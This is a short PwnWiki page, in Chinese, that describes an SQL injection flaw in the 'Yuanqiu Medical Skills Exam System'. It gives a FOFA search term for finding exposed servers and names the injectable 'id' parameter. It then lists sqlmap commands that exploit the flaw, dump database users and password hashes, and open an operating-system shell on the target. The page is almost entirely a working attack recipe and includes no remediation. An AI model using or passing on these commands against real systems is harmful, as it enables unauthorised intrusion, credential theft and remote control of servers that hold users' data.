遠秋醫學技能考試系統 SQL注入漏洞

From PwnWiki
Revision as of 09:30, 17 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> 远秋医学技能考试系统 </pre> ==注入點== <pre> http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1 </pre> ==SQLMAP== <pre> sqlmap -u "http://x...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

远秋医学技能考试系统

注入點

http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1

SQLMAP

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -p id -batch

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -users
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --password 

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --random-agent --os-shell